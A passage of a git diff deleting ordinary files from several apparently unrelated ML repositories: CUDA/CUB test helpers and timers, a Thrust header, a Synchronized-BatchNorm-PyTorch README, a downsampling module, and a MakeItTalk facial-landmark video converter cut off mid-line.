operator >(const TestFoo &b) const - { - if (x > b.x) return true; else if (b.x > x) return false; - if (y > b.y) return true; else if (b.y > y) return false; - if (z > b.z) return true; else if (b.z > z) return false; - return w > b.w; - } - -}; - -/** - * TestFoo ostream operator - */ -std::ostream& operator<<(std::ostream& os, const TestFoo& val) -{ - os << '(' << val.x << ',' << val.y << ',' << val.z << ',' << CoutCast(val.w) << ')'; - return os; -} - -/** - * TestFoo test initialization - */ -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, TestFoo &value, int index = 0) -{ - InitValue(gen_mode, value.x, index); - InitValue(gen_mode, value.y, index); - InitValue(gen_mode, value.z, index); - InitValue(gen_mode, value.w, index); -} - - -/// numeric_limits specialization -namespace cub { -template<> -struct NumericTraits -{ - static const Category CATEGORY = NOT_A_NUMBER; - enum { - PRIMITIVE = false, - NULL_TYPE = false, - }; - static TestFoo Max() - { - return TestFoo::MakeTestFoo( - NumericTraits::Max(), - NumericTraits::Max(), - NumericTraits::Max(), - NumericTraits::Max()); - } - - static TestFoo Lowest() - { - return TestFoo::MakeTestFoo( - NumericTraits::Lowest(), - NumericTraits::Lowest(), - NumericTraits::Lowest(), - NumericTraits::Lowest()); - } -}; -} // namespace cub - - -//--------------------------------------------------------------------- -// Complex data type TestBar (with optimizations for fence-free warp-synchrony) -//--------------------------------------------------------------------- - -/** - * TestBar complex data type - */ -struct TestBar -{ - long long x; - int y; - - // Constructor - __host__ __device__ __forceinline__ TestBar() : x(0), y(0) - {} - - // Constructor - __host__ __device__ __forceinline__ TestBar(int b) : x(b), y(b) - {} - - // Constructor - __host__ __device__ __forceinline__ TestBar(long long x, int y) : x(x), y(y) - {} - - // Assignment from int operator - __host__ __device__ __forceinline__ TestBar& operator =(int b) - { - x = b; - y = b; - return *this; - } - - // Summation operator - __host__ __device__ __forceinline__ TestBar operator+(const TestBar &b) const - { - return TestBar(x + b.x, y + b.y); - } - - // Inequality operator - __host__ __device__ __forceinline__ bool operator !=(const TestBar &b) const - { - return (x != b.x) || (y != b.y); - } - - // Equality operator - __host__ __device__ __forceinline__ bool operator ==(const TestBar &b) const - { - return (x == b.x) && (y == b.y); - } - - // Less than operator - __host__ __device__ __forceinline__ bool operator <(const TestBar &b) const - { - if (x < b.x) return true; else if (b.x < x) return false; - return y < b.y; - } - - // Greater than operator - __host__ __device__ __forceinline__ bool operator >(const TestBar &b) const - { - if (x > b.x) return true; else if (b.x > x) return false; - return y > b.y; - } - -}; - - -/** - * TestBar ostream operator - */ -std::ostream& operator<<(std::ostream& os, const TestBar& val) -{ - os << '(' << val.x << ',' << val.y << ')'; - return os; -} - -/** - * TestBar test initialization - */ -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, TestBar &value, int index = 0) -{ - InitValue(gen_mode, value.x, index); - InitValue(gen_mode, value.y, index); -} - -/// numeric_limits specialization -namespace cub { -template<> -struct NumericTraits -{ - static const Category CATEGORY = NOT_A_NUMBER; - enum { - PRIMITIVE = false, - NULL_TYPE = false, - }; - static TestBar Max() - { - return TestBar( - NumericTraits::Max(), - NumericTraits::Max()); - } - - static TestBar Lowest() - { - return TestBar( - NumericTraits::Lowest(), - NumericTraits::Lowest()); - } -}; -} // namespace cub - - -/****************************************************************************** - * Helper routines for list comparison and display - ******************************************************************************/ - - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(T* computed, S* reference, OffsetT len, bool verbose = true) -{ - for (OffsetT i = 0; i < len; i++) - { - if (computed[i] != reference[i]) - { - if (verbose) std::cout << "INCORRECT: [" << i << "]: " - << CoutCast(computed[i]) << " != " - << CoutCast(reference[i]); - return 1; - } - } - return 0; -} - - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(float* computed, float* reference, OffsetT len, bool verbose = true) -{ - for (OffsetT i = 0; i < len; i++) - { - if (computed[i] != reference[i]) - { - float difference = std::abs(computed[i]-reference[i]); - float fraction = difference / std::abs(reference[i]); - - if (fraction > 0.0001) - { - if (verbose) std::cout << "INCORRECT: [" << i << "]: " - << "(computed) " << CoutCast(computed[i]) << " != " - << CoutCast(reference[i]) << " (difference:" << difference << ", fraction: " << fraction << ")"; - return 1; - } - } - } - return 0; -} - - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(cub::NullType* computed, cub::NullType* reference, OffsetT len, bool verbose = true) -{ - return 0; -} - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(double* computed, double* reference, OffsetT len, bool verbose = true) -{ - for (OffsetT i = 0; i < len; i++) - { - if (computed[i] != reference[i]) - { - double difference = std::abs(computed[i]-reference[i]); - double fraction = difference / std::abs(reference[i]); - - if (fraction > 0.0001) - { - if (verbose) std::cout << "INCORRECT: [" << i << "]: " - << CoutCast(computed[i]) << " != " - << CoutCast(reference[i]) << " (difference:" << difference << ", fraction: " << fraction << ")"; - return 1; - } - } - } - return 0; -} - - -/** - * Verify the contents of a device array match those - * of a host array - */ -int CompareDeviceResults( - cub::NullType */* h_reference */, - cub::NullType */* d_data */, - size_t /* num_items */, - bool /* verbose */ = true, - bool /* display_data */ = false) -{ - return 0; -} - -/** - * Verify the contents of a device array match those - * of a host array - */ -template -int CompareDeviceResults( - S *h_reference, - cub::DiscardOutputIterator d_data, - size_t num_items, - bool verbose = true, - bool display_data = false) -{ - return 0; -} - -/** - * Verify the contents of a device array match those - * of a host array - */ -template -int CompareDeviceResults( - S *h_reference, - T *d_data, - size_t num_items, - bool verbose = true, - bool display_data = false) -{ - // Allocate array on host - T *h_data = (T*) malloc(num_items * sizeof(T)); - - // Copy data back - cudaMemcpy(h_data, d_data, sizeof(T) * num_items, cudaMemcpyDeviceToHost); - - // Display data - if (display_data) - { - printf("Reference:\n"); - for (int i = 0; i < int(num_items); i++) - { - std::cout << CoutCast(h_reference[i]) << ", "; - } - printf("\n\nComputed:\n"); - for (int i = 0; i < int(num_items); i++) - { - std::cout << CoutCast(h_data[i]) << ", "; - } - printf("\n\n"); - } - - // Check - int retval = CompareResults(h_data, h_reference, num_items, verbose); - - // Cleanup - if (h_data) free(h_data); - - return retval; -} - - -/** - * Verify the contents of a device array match those - * of a device array - */ -template -int CompareDeviceDeviceResults( - T *d_reference, - T *d_data, - size_t num_items, - bool verbose = true, - bool display_data = false) -{ - // Allocate array on host - T *h_reference = (T*) malloc(num_items * sizeof(T)); - T *h_data = (T*) malloc(num_items * sizeof(T)); - - // Copy data back - cudaMemcpy(h_reference, d_reference, sizeof(T) * num_items, cudaMemcpyDeviceToHost); - cudaMemcpy(h_data, d_data, sizeof(T) * num_items, cudaMemcpyDeviceToHost); - - // Display data - if (display_data) { - printf("Reference:\n"); - for (int i = 0; i < num_items; i++) - { - std::cout << CoutCast(h_reference[i]) << ", "; - } - printf("\n\nComputed:\n"); - for (int i = 0; i < num_items; i++) - { - std::cout << CoutCast(h_data[i]) << ", "; - } - printf("\n\n"); - } - - // Check - int retval = CompareResults(h_data, h_reference, num_items, verbose); - - // Cleanup - if (h_reference) free(h_reference); - if (h_data) free(h_data); - - return retval; -} - - -/** - * Print the contents of a host array - */ -void DisplayResults( - cub::NullType */* h_data */, - size_t /* num_items */) -{} - - -/** - * Print the contents of a host array - */ -template -void DisplayResults( - InputIteratorT h_data, - size_t num_items) -{ - // Display data - for (int i = 0; i < int(num_items); i++) - { - std::cout << CoutCast(h_data[i]) << ", "; - } - printf("\n"); -} - - -/** - * Print the contents of a device array - */ -template -void DisplayDeviceResults( - T *d_data, - size_t num_items) -{ - // Allocate array on host - T *h_data = (T*) malloc(num_items * sizeof(T)); - - // Copy data back - cudaMemcpy(h_data, d_data, sizeof(T) * num_items, cudaMemcpyDeviceToHost); - - DisplayResults(h_data, num_items); - - // Cleanup - if (h_data) free(h_data); -} - - -/****************************************************************************** - * Segment descriptor generation - ******************************************************************************/ - -/** - * Initialize segments - */ -void InitializeSegments( - int num_items, - int num_segments, - int *h_segment_offsets, - bool verbose = false) -{ - if (num_segments <= 0) - return; - - unsigned int expected_segment_length = (num_items + num_segments - 1) / num_segments; - int offset = 0; - for (int i = 0; i < num_segments; ++i) - { - h_segment_offsets[i] = offset; - - unsigned int segment_length = RandomValue((expected_segment_length * 2) + 1); - offset += segment_length; - offset = CUB_MIN(offset, num_items); - } - h_segment_offsets[num_segments] = num_items; - - if (verbose) - { - printf("Segment offsets: "); - DisplayResults(h_segment_offsets, num_segments + 1); - } -} - - -/****************************************************************************** - * Timing - ******************************************************************************/ - - -struct CpuTimer -{ -#if defined(_WIN32) || defined(_WIN64) - - LARGE_INTEGER ll_freq; - LARGE_INTEGER ll_start; - LARGE_INTEGER ll_stop; - - CpuTimer() - { - QueryPerformanceFrequency(&ll_freq); - } - - void Start() - { - QueryPerformanceCounter(&ll_start); - } - - void Stop() - { - QueryPerformanceCounter(&ll_stop); - } - - float ElapsedMillis() - { - double start = double(ll_start.QuadPart) / double(ll_freq.QuadPart); - double stop = double(ll_stop.QuadPart) / double(ll_freq.QuadPart); - - return float((stop - start) * 1000); - } - -#else - - rusage start; - rusage stop; - - void Start() - { - getrusage(RUSAGE_SELF, &start); - } - - void Stop() - { - getrusage(RUSAGE_SELF, &stop); - } - - float ElapsedMillis() - { - float sec = stop.ru_utime.tv_sec - start.ru_utime.tv_sec; - float usec = stop.ru_utime.tv_usec - start.ru_utime.tv_usec; - - return (sec * 1000) + (usec / 1000); - } - -#endif -}; - -struct GpuTimer -{ - cudaEvent_t start; - cudaEvent_t stop; - - GpuTimer() - { - cudaEventCreate(&start); - cudaEventCreate(&stop); - } - - ~GpuTimer() - { - cudaEventDestroy(start); - cudaEventDestroy(stop); - } - - void Start() - { - cudaEventRecord(start, 0); - } - - void Stop() - { - cudaEventRecord(stop, 0); - } - - float ElapsedMillis() - { - float elapsed; - cudaEventSynchronize(stop); - cudaEventElapsedTime(&elapsed, start, stop); - return elapsed; - } -}; diff --git a/spaces/ma-xu/LIVE/thrust/thrust/system/cpp/detail/fill.h b/spaces/ma-xu/LIVE/thrust/thrust/system/cpp/detail/fill.h deleted file mode 100644 index c6ae90664ad9538e73febfde86c334011de417c8..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/thrust/system/cpp/detail/fill.h +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system has no special version of this algorithm - diff --git a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/Synchronized-BatchNorm-PyTorch/README.md b/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/Synchronized-BatchNorm-PyTorch/README.md deleted file mode 100644 index 779983436c9727dd0d6301a1c857f2360245b51d..0000000000000000000000000000000000000000 --- a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/Synchronized-BatchNorm-PyTorch/README.md +++ /dev/null @@ -1,118 +0,0 @@ -# Synchronized-BatchNorm-PyTorch - -**IMPORTANT: Please read the "Implementation details and highlights" section before use.** - -Synchronized Batch Normalization implementation in PyTorch. - -This module differs from the built-in PyTorch BatchNorm as the mean and -standard-deviation are reduced across all devices during training. - -For example, when one uses `nn.DataParallel` to wrap the network during -training, PyTorch's implementation normalize the tensor on each device using -the statistics only on that device, which accelerated the computation and -is also easy to implement, but the statistics might be inaccurate. -Instead, in this synchronized version, the statistics will be computed -over all training samples distributed on multiple devices. - -Note that, for one-GPU or CPU-only case, this module behaves exactly same -as the built-in PyTorch implementation. - -This module is currently only a prototype version for research usages. As mentioned below, -it has its limitations and may even suffer from some design problems. If you have any -questions or suggestions, please feel free to -[open an issue](https://github.com/vacancy/Synchronized-BatchNorm-PyTorch/issues) or -[submit a pull request](https://github.com/vacancy/Synchronized-BatchNorm-PyTorch/issues). - -## Why Synchronized BatchNorm? - -Although the typical implementation of BatchNorm working on multiple devices (GPUs) -is fast (with no communication overhead), it inevitably reduces the size of batch size, -which potentially degenerates the performance. This is not a significant issue in some -standard vision tasks such as ImageNet classification (as the batch size per device -is usually large enough to obtain good statistics). However, it will hurt the performance -in some tasks that the batch size is usually very small (e.g., 1 per GPU). - -For example, the importance of synchronized batch normalization in object detection has been recently proved with a -an extensive analysis in the paper [MegDet: A Large Mini-Batch Object Detector](https://arxiv.org/abs/1711.07240). - -## Usage - -To use the Synchronized Batch Normalization, we add a data parallel replication callback. This introduces a slight -difference with typical usage of the `nn.DataParallel`. - -Use it with a provided, customized data parallel wrapper: - -```python -from sync_batchnorm import SynchronizedBatchNorm1d, DataParallelWithCallback - -sync_bn = SynchronizedBatchNorm1d(10, eps=1e-5, affine=False) -sync_bn = DataParallelWithCallback(sync_bn, device_ids=[0, 1]) -``` - -Or, if you are using a customized data parallel module, you can use this library as a monkey patching. - -```python -from torch.nn import DataParallel # or your customized DataParallel module -from sync_batchnorm import SynchronizedBatchNorm1d, patch_replication_callback - -sync_bn = SynchronizedBatchNorm1d(10, eps=1e-5, affine=False) -sync_bn = DataParallel(sync_bn, device_ids=[0, 1]) -patch_replication_callback(sync_bn) # monkey-patching -``` - -You can use `convert_model` to convert your model to use Synchronized BatchNorm easily. - -```python -import torch.nn as nn -from torchvision import models -from sync_batchnorm import convert_model -# m is a standard pytorch model -m = models.resnet18(True) -m = nn.DataParallel(m) -# after convert, m is using SyncBN -m = convert_model(m) -``` - -See also `tests/test_sync_batchnorm.py` for numeric result comparison. - -## Implementation details and highlights - -If you are interested in how batch statistics are reduced and broadcasted among multiple devices, please take a look -at the code with detailed comments. Here we only emphasize some highlights of the implementation: - -- This implementation is in pure-python. No C++ extra extension libs. -- Easy to use as demonstrated above. -- It uses unbiased variance to update the moving average, and use `sqrt(max(var, eps))` instead of `sqrt(var + eps)`. -- The implementation requires that each module on different devices should invoke the `batchnorm` for exactly SAME -amount of times in each forward pass. For example, you can not only call `batchnorm` on GPU0 but not on GPU1. The `#i -(i = 1, 2, 3, ...)` calls of the `batchnorm` on each device will be viewed as a whole and the statistics will be reduced. -This is tricky but is a good way to handle PyTorch's dynamic computation graph. Although sounds complicated, this -will usually not be the issue for most of the models. - -## Known issues - -#### Runtime error on backward pass. - -Due to a [PyTorch Bug](https://github.com/pytorch/pytorch/issues/3883), using old PyTorch libraries will trigger an `RuntimeError` with messages like: - -``` -Assertion `pos >= 0 && pos < buffer.size()` failed. -``` - -This has already been solved in the newest PyTorch repo, which, unfortunately, has not been pushed to the official and anaconda binary release. Thus, you are required to build the PyTorch package from the source according to the - instructions [here](https://github.com/pytorch/pytorch#from-source). - -#### Numeric error. - -Because this library does not fuse the normalization and statistics operations in C++ (nor CUDA), it is less -numerically stable compared to the original PyTorch implementation. Detailed analysis can be found in -`tests/test_sync_batchnorm.py`. - -## Authors and License: - -Copyright (c) 2018-, [Jiayuan Mao](https://vccy.xyz). - -**Contributors**: [Tete Xiao](https://tetexiao.com), [DTennant](https://github.com/DTennant). - -Distributed under **MIT License** (See LICENSE) - diff --git a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/antialiasing.py b/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/antialiasing.py deleted file mode 100644 index 78da8ebdef518ffe597da1d03ffda09b89b22076..0000000000000000000000000000000000000000 --- a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/antialiasing.py +++ /dev/null @@ -1,70 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT License. - -import torch -import torch.nn.parallel -import numpy as np -import torch.nn as nn -import torch.nn.functional as F - - -class Downsample(nn.Module): - # https://github.com/adobe/antialiased-cnns - - def __init__(self, pad_type="reflect", filt_size=3, stride=2, channels=None, pad_off=0): - super(Downsample, self).__init__() - self.filt_size = filt_size - self.pad_off = pad_off - self.pad_sizes = [ - int(1.0 * (filt_size - 1) / 2), - int(np.ceil(1.0 * (filt_size - 1) / 2)), - int(1.0 * (filt_size - 1) / 2), - int(np.ceil(1.0 * (filt_size - 1) / 2)), - ] - self.pad_sizes = [pad_size + pad_off for pad_size in self.pad_sizes] - self.stride = stride - self.off = int((self.stride - 1) / 2.0) - self.channels = channels - - # print('Filter size [%i]'%filt_size) - if self.filt_size == 1: - a = np.array([1.0,]) - elif self.filt_size == 2: - a = np.array([1.0, 1.0]) - elif self.filt_size == 3: - a = np.array([1.0, 2.0, 1.0]) - elif self.filt_size == 4: - a = np.array([1.0, 3.0, 3.0, 1.0]) - elif self.filt_size == 5: - a = np.array([1.0, 4.0, 6.0, 4.0, 1.0]) - elif self.filt_size == 6: - a = np.array([1.0, 5.0, 10.0, 10.0, 5.0, 1.0]) - elif self.filt_size == 7: - a = np.array([1.0, 6.0, 15.0, 20.0, 15.0, 6.0, 1.0]) - - filt = torch.Tensor(a[:, None] * a[None, :]) - filt = filt / torch.sum(filt) - self.register_buffer("filt", filt[None, None, :, :].repeat((self.channels, 1, 1, 1))) - - self.pad = get_pad_layer(pad_type)(self.pad_sizes) - - def forward(self, inp): - if self.filt_size == 1: - if self.pad_off == 0: - return inp[:, :, :: self.stride, :: self.stride] - else: - return self.pad(inp)[:, :, :: self.stride, :: self.stride] - else: - return F.conv2d(self.pad(inp), self.filt, stride=self.stride, groups=inp.shape[1]) - - -def get_pad_layer(pad_type): - if pad_type in ["refl", "reflect"]: - PadLayer = nn.ReflectionPad2d - elif pad_type in ["repl", "replicate"]: - PadLayer = nn.ReplicationPad2d - elif pad_type == "zero": - PadLayer = nn.ZeroPad2d - else: - print("Pad type [%s] not recognized" % pad_type) - return PadLayer diff --git a/spaces/marlenezw/audio-driven-animations/MakeItTalk/src/dataset/utils/Av2Flau_Convertor.py b/spaces/marlenezw/audio-driven-animations/MakeItTalk/src/dataset/utils/Av2Flau_Convertor.py deleted file mode 100644 index 91303de03754bc9ffefc6f589bb685934747e15c..0000000000000000000000000000000000000000 --- a/spaces/marlenezw/audio-driven-animations/MakeItTalk/src/dataset/utils/Av2Flau_Convertor.py +++ /dev/null @@ -1,425 +0,0 @@ -""" - # Copyright 2020 Adobe - # All Rights Reserved. - - # NOTICE: Adobe permits you to use, modify, and distribute this file in - # accordance with the terms of the Adobe license agreement accompanying - # it. - -""" - -import numpy as np -import os -import ffmpeg -import cv2 -import face_alignment -from src.dataset.utils import icp - - -class Point: - def __init__(self, x, y): - self.x = x - self.y = y - - -class ShapeParts: - def __init__(self, np_pts): - self.data = np_pts - - def part(self, idx): - return Point(self.data[idx, 0], self.data[idx, 1]) - - -class Av2Flau_Convertor(): - """ - - Any video to facial landmark and audio numpy data converter. - - """ - - def __init__(self, video_dir, out_dir, idx=0): - - self.video_dir = video_dir - if ('\\' in video_dir): - self.video_name = video_dir.split('\\')[-1] - else: - self.video_name = video_dir.split('/')[-1] - self.out_dir = out_dir - self.idx = idx - self.input_format = self.video_dir[-4:] - - # landmark predictor = FANet - self.predictor = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, device='cuda', flip_input=True) - - # landmark register - self.t_shape_idx = (27, 28, 29, 30, 33, 36, 39, 42, 45) - - def convert(self, max_num_frames=250, save_audio=False, show=False, register=False): - - # Step 1: preclean video: check stream==2, convert fps/sample_rate, - ret, wfn = self.__preclean_video__() - if (not ret): - return - - # Step 2: detect facial landmark - wfn = self.video_dir.replace(self.input_format, '_preclean.mp4') - ret, fl2d, fl3d = self.__video_facial_landmark_detection__(video_dir=wfn, display=False, max_num_frames=max_num_frames) - if (not ret): - return - if (len(fl3d) < 9): - print('The length of the landmark is too short, skip') - return - - # Step 3: raw save landmark / audio - fl3d = np.array(fl3d) - np.savetxt(os.path.join(self.out_dir, 'raw_fl3d/fan_{:05d}_{}_3d.txt'.format(self.idx, self.video_name[:-4])), - fl3d, fmt='%.2f') - if (save_audio): - self.__save_audio__(video_dir=self.video_dir.replace(self.input_format, '_preclean.mp4'), fl3d=fl3d) - - # Step 3.5: merge a/v together (optional) - if (show): - sf, ef = (fl3d[0][0], fl3d[-1][0]) if fl3d.shape[0] > 0 else (0, 0) - print(sf, ef) - print(self.video_dir.replace(self.input_format, '_fl_detect.mp4'), - os.path.join(self.out_dir, 'tmp_v', '{:05d}_{}_fl_av.mp4'.format( - self.idx, self.video_name[:-4])) - ) - self.__ffmpeg_merge_av__( - video_dir=self.video_dir.replace(self.input_format, '_fl_detect.mp4'), - audio_dir=self.video_dir.replace(self.input_format, '_preclean.mp4'), - WriteFileName=os.path.join(self.out_dir, 'tmp_v', '{:05d}_{}_fl_av.mp4'.format( - self.idx, self.video_name[:-4])), - start_end_frame=(int(sf), int(ef))) - - # Step 4: remove tmp files - os.remove(self.video_dir.replace(self.input_format, '_preclean.mp4')) - if(os.path.isfile(self.video_dir.replace(self.input_format, '_fl_detect.mp4'))): - os.remove(self.video_dir.replace(self.input_format, '_fl_detect.mp4')) - - # Step 5: register fl3d - if (register): - self.__single_landmark_3d_register__(fl3d) - # TODO: visualize register fl3d - - ''' ======================================================================== - - STEP 1: Preclean video - - ======================================================================== ''' - - def __preclean_video__(self, WriteFileName='_preclean.mp4', fps=25, sample_rate=16000): - ''' - Pre-clean downloaded videos. Return false if more than 2 streams found. - Then convert it to fps=25, sample_rate=16kHz - ''' - input_video_dir = self.video_dir if '_x_' not in self.video_dir else self.video_dir.replace('_x_', '/') - - probe = ffmpeg.probe(input_video_dir) - # print(probe['streams']) - # print(len(probe['streams'])) - # if(len(probe['streams']) != 2): - # print('Error: not valid for # of a/v channel == 2.') - # return False, None - # exit(0) - # probe['streams'] = probe['streams'][0::2] - - codec = {'video': '', 'audio': ''} - for i, stream in enumerate(probe['streams'][0:2]): - codec[stream['codec_type']] = stream['codec_name'] - - # create preclean video - ( - ffmpeg - .input(input_video_dir) - .output(self.video_dir.replace(self.input_format, WriteFileName), - # vcodec=codec['video'], - # acodec=codec['audio'], - r=fps, ar=sample_rate) - .overwrite_output().global_args('-loglevel', 'quiet') - .run() - ) - - return True, self.video_dir.replace(self.input_format, WriteFileName) - - ''' ======================================================================== - - STEP 2: Detect facial landmark - - ======================================================================== ''' - - def __video_facial_landmark_detection__(self, video_dir=None, display=False, WriteFileName='_fl_detect.mp4', - max_num_frames=250, write=False): - ''' - Get facial landmark from video. - ''' - - # load video - print('video_dir : ' + video_dir) - video = cv2.VideoCapture(video_dir) - - # return false if cannot open - if (video.isOpened() == False): - print('Unable to open video file') - return False, None - - # display info - length = int(video.get(cv2.CAP_PROP_FRAME_COUNT)) - fps = video.get(cv2.CAP_PROP_FPS) - w = int(video.get(cv2.CAP_PROP_FRAME_WIDTH)) - h = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT)) - print('Process Video {}, len: {}, FPS: {:.2f}, W X H: {} x {}'.format(video_dir, length, fps, w, h)) - - if(write): - writer = cv2.VideoWriter(self.video_dir.replace(self.input_format, WriteFileName), - cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), fps, (w, h)) - - video_facial_landmark = [] # face-landmark np array per frame =: idx + [x,y] * 68 - video_facial_landmark_3d = [] # face-landmark np array per frame =: idx + [x,y,z] * 68 - frame_id = 0 - not_detected_frames = 0 - - while (video.isOpened()): - ret, frame = video.read() - # reach EOF - if (ret == False): - break - - # too many not-detected frames (in middle of video) - if (not_detected_frames > 5): - if (len(video_facial_landmark) < 10): - # at beginning of the video - video_facial_landmark = [] - video_facial_landmark_3d = [] - else: - break - - # dlib facial landmark detect - img_ret, shape, shape_3d = self.__image_facial_landmark_detection__(img=frame) - - # successfully detected - if (img_ret): - # print('\t ==> frame {}/{}'.format(frame_id, length)) - - # current frame xy coordinates - xys = [] - for part_i in range(68): - xys.append(shape.part(part_i).x) - xys.append(shape.part(part_i).y) - - # check any not_detected_frames, and interp them - if (not_detected_frames > 0 and len(video_facial_landmark) > 0): - # interpolate - def interp(last, cur, num, dims=68 * 2 + 1): - interp_xys_np = np.zeros((num, dims)) - for dim in range(dims): - interp_xys_np[:, dim] = np.interp(np.arange(0, num), [-1, num], [last[dim], cur[dim]]) - interp_xys_np = np.round(interp_xys_np).astype('int') - interp_xys = [list(xy) for xy in interp_xys_np] - return interp_xys - - interp_xys = interp(video_facial_landmark[-1], [frame_id] + xys, not_detected_frames) - video_facial_landmark += interp_xys - - not_detected_frames = 0 - - # save landmark/frame_index - video_facial_landmark.append([frame_id] + xys) - if (shape_3d.any()): - video_facial_landmark_3d.append([frame_id] + list(np.reshape(shape_3d, -1))) - - if(write): - frame = self.__vis_landmark_on_img__(frame, shape) - - else: - print('\t ==> frame {}/{} Not detected'.format(frame_id, length)) - not_detected_frames += 1 - - if (display): - cv2.imshow('Frame', frame) - if (cv2.waitKey(10) == ord('q')): - break - - if(write): - writer.write(frame) - frame_id += 1 - - if(frame_id > max_num_frames): - break - - video.release() - if(write): - writer.release() - cv2.destroyAllWindows() - - print('\t ==> Final processed frames {}/{}'.format(frame_id, length)) - - return True, video_facial_landmark, video_facial_landmark_3d - - def __image_facial_landmark_detection__(self, img=None): - ''' - Get facial landmark from single image by FANet - ''' - - shapes = self.predictor.get_landmarks(img) - if (not shapes): - return False, None, None - - max_size_idx = 0 - shape = ShapeParts(shapes[max_size_idx][:, 0:2]) - shape_3d = shapes[max_size_idx] - - # when use 2d estimator - shape_3d = np.concatenate([shape_3d, np.ones(shape=(68, 1))], axis=1) - - return True, shape, shape_3d - - def __vis_landmark_on_img__(self, img, shape, linewidth=2): - ''' - Visualize landmark on images. - ''' - if (type(shape) == ShapeParts): - def draw_curve(idx_list, color=(0, 255, 0), loop=False, lineWidth=linewidth): - for i in idx_list: - cv2.line(img, (shape.part(i).x, shape.part(i).y), (shape.part(i + 1).x, shape.part(i + 1).y), - color, lineWidth) - if (loop): - cv2.line(img, (shape.part(idx_list[0]).x, shape.part(idx_list[0]).y), - (shape.part(idx_list[-1] + 1).x, shape.part(idx_list[-1] + 1).y), color, lineWidth) - - draw_curve(list(range(0, 16))) # jaw - draw_curve(list(range(17, 21))) # eye brow - draw_curve(list(range(22, 26))) - draw_curve(list(range(27, 35))) # nose - draw_curve(list(range(36, 41)), loop=True) # eyes - draw_curve(list(range(42, 47)), loop=True) - draw_curve(list(range(48, 59)), loop=True) # mouth - draw_curve(list(range(60, 67)), loop=True) - - else: - def draw_curve(idx_list, color=(0, 255, 0), loop=False, lineWidth=linewidth): - for i in idx_list: - cv2.line(img, (shape[i, 0], shape[i, 1]), (shape[i + 1, 0], shape[i + 1, 1]), color, lineWidth) - if (loop): - cv2.line(img, (shape[idx_list[0], 0], shape[idx_list[0], 1]), - (shape[idx_list[-1] + 1, 0], shape[idx_list[-1] + 1, 1]), color, lineWidth) - - draw_curve(list(range(0, 16))) # jaw - draw_curve(list(range(17, 21))) # eye brow - draw_curve(list(range(22, 26))) - draw_curve(list(range(27, 35))) # nose - draw_curve(list(range(36, 41)), loop=True) # eyes - draw_curve(list(range(42, 47)), loop=True) - draw_curve(list(range(48, 59)), loop=True) # mouth - draw_curve(list(range(60, 67)), loop=True) - - return img - - def __ffmpeg_merge_av__(self, video_dir, audio_dir, WriteFileName, start_end_frame): - probe = ffmpeg.probe(video_dir) - fps = probe['streams'][0]['avg_frame_rate'] - spf = float(fps.split('/')[1]) / float(fps.split('/')[0]) - sf, ef = start_end_frame - st, tt = sf * spf, ef * spf - sf * spf - - vin = ffmpeg.input(video_dir).video - # ain = ffmpeg.input(audio_dir).audio - # out = ffmpeg.output(vin, ain, WriteFileName, codec='copy', ss=st, t=tt, shortest=None) - out = ffmpeg.output(vin, WriteFileName, codec='copy', ss=st, t=tt, shortest=None) - out = out.overwrite_output().global_args('-loglevel', 'quiet') - out.run() - - # os.system('ffmpeg -i {} -codec copy -ss {} -t {} {}'.format(video_dir, st, tt, WriteFileName)) - - def __save_audio__(self, video_dir, fl3d): - """ - Extract audio from preclean video. Used for creating audio-aware dataset. - - """ - sf, ef = fl3d[0][0], fl3d[-1][0] - - probe = ffmpeg.probe(video_dir) - fps = probe['streams'][0]['avg_frame_rate'] - spf = float(fps.split('/')[1]) / float(fps.split('/')[0]) - st, tt = sf * spf, ef * spf - sf * spf - - audio_dir = os.path.join(self.out_dir, 'raw_wav', '{:05d}_{}_audio.wav'.format(self.idx, self.video_name[:-4])) - ( - ffmpeg - .input(video_dir) - .output(audio_dir, ss=st, t=tt) - .overwrite_output().global_args('-loglevel', 'quiet') - .run() - ) - - ''' ======================================================================== - - STEP 5: Landmark register - - ======================================================================== ''' - - def __single_landmark_3d_register__(self, fl3d, display=False): - """ - Register a single 3d landmark file - - """ - # Step 1 : Load and Smooth - from scipy.signal import savgol_filter - lines = savgol_filter(fl3d, 7, 3, axis=0) - - all_landmarks = lines[:, 1:].reshape((-1, 68, 3)) # remove frame idx - w, h = int(np.max(all_landmarks[:, :, 0])) + 20, int(np.max(all_landmarks[:, :, 1])) + 20 - - # Step 2 : setup anchor face - print('Using exisiting ' + 'dataset/utils/ANCHOR_T_SHAPE_{}.txt'.format(len(self.t_shape_idx))) - anchor_t_shape = np.loadtxt('dataset/utils/ANCHOR_T_SHAPE_{}.txt'.format(len(self.t_shape_idx))) - - registered_landmarks_to_save = [] - registered_affine_mat_to_save = [] - # for each line - for line in lines: - frame_id = line[0] - landmarks = line[1:].reshape(68, 3) - - # Step 3 : ICP on (frame, anchor) - frame_t_shape = landmarks[self.t_shape_idx, :] - - T, distance, itr = icp(frame_t_shape, anchor_t_shape) - - # Step 4 : Affine transform - landmarks = np.hstack((landmarks, np.ones((68, 1)))) - registered_landmarks = np.dot(T, landmarks.T).T - err = 